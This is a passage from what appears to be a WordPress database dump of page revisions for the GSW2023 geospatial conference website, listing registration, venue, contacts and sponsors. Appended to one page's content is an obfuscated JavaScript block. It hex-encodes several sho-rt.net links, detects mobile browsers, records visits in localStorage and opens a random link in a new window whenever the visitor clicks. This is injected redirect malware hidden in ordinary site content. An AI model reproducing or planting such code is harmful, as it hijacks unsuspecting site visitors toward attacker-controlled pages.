bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:40:27','2023-06-09 13:40:27','',3066,'https://gsw2023.com/?p=4643',0,'revision','',0),
(4644,1,'2023-06-09 13:48:47','2023-06-09 13:48:47','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: 